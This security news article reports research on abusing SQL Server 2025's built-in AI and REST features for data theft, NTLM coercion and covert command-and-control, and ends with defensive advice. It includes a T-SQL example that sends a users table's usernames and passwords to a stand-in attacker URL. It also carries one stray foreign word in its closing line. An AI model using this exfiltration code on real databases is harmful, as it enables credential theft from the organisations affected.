A new security analysis has revealed that Microsoft SQL Server 2025’s native AI capabilities can be repurposed by attackers to stealthily exfiltrate sensitive data and establish command-and-control (C2) channels directly within the database engine, significantly expanding the post-exploitation attack surface.
Security researcher Justin Kalnasy of SpecterOps demonstrated that newly introduced AI-focused features, intended to support modern data workflows such as Retrieval-Augmented Generation (RAG), can be abused to bypass traditional detection mechanisms.
These features include the stored procedure sp_invoke_external_rest_endpoint, the CREATE EXTERNAL MODEL function, and AI_GENERATE_EMBEDDINGS, all of which enable SQL Server to communicate with external services over HTTPS.
Hackers Could Abuse SQL Server 2025
The most critical issue lies in the sp_invoke_external_rest_endpoint capability, which allows database instances to send arbitrary HTTP requests to external endpoints with payloads up to 100MB.
While designed for API integrations, this functionality effectively provides attackers with a built-in data exfiltration channel.
Once an adversary gains high-privileged access, such as sysadmin, they can extract entire tables or files and transmit them to attacker-controlled infrastructure without relying on traditional tools like PowerShell or xp_cmdshell, which are more likely to trigger alerts.
For example, attackers can serialize sensitive database records into JSON format and exfiltrate them via HTTPS:
DECLARE @payload NVARCHAR(MAX);
SELECT @payload = (
SELECT username, password
FROM dbo.app_users
FOR JSON AUTO
);
EXEC sp_invoke_external_rest_endpoint
@url = N'https://attacker-server/collect',
@method = 'POST',
@payload = @payload;This approach allows bulk data theft in chunks, reducing operational friction and avoiding bandwidth constraints typically associated with C2 frameworks.
Additionally, file-level exfiltration can be achieved by combining the REST endpoint feature with OPENROWSET, enabling attackers to read sensitive files from the underlying system and transmit them externally.
Beyond direct data theft, the research highlights how SQL Server 2025 can be transformed into a persistent exfiltration platform.
By leveraging triggers, attackers can automatically send newly inserted or updated records to remote servers in real time. This enables continuous credential harvesting or data leakage without repeated manual interaction.
Another notable technique involves abusing the CREATE EXTERNAL MODEL feature to coerce NTLM authentication over SMB.
By specifying a malicious UNC path as the model location, attackers can force SQL Server to authenticate against attacker-controlled infrastructure, enabling credential capture or relay attacks within enterprise environments.
More advanced tradecraft combines these AI features into a covert C2 channel. By registering an external model that points to an attacker-controlled API and using AI_GENERATE_EMBEDDINGS as a communication mechanism, adversaries can issue commands and receive results disguised as legitimate AI embedding traffic.
This technique blends malicious activity with normal AI workflows, making detection significantly more difficult, especially in environments where outbound HTTPS traffic from database servers is now considered legitimate.
The introduction of these capabilities represents a fundamental shift in how database systems operate within enterprise networks.
Historically, outbound traffic from SQL servers was considered suspicious; however, AI integration has normalized this behavior, rendering traditional detection strategies less effective.
Defenders are advised to reassess SQL Server security baselines, particularly around privilege management and feature enablement.
Monitoring for the creation or modification of external models, auditing the use of high-risk features such as xp_cmdshell and CLR assemblies, and restricting outbound network access from database servers are critical mitigation steps. Organizations leveraging AI features should also baseline expected traffic patterns to identify anomalies indicative of abuse.
This research underscores a broader trend: as AI capabilities become embedded in core enterprise software, they introduce new avenues for stealthy exploitation. Without robust monitoring and strict access controls, these features risk becoming powerful tools for attackers operating داخل trusted environments.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
